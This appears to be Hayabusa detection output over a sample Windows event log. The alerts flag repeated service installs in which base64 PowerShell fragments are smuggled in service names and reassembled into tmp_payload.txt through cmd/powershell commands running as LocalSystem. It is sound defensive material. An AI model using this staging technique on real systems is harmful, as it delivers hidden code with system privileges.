2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:39.787 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: XQ0KDQogICAgICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
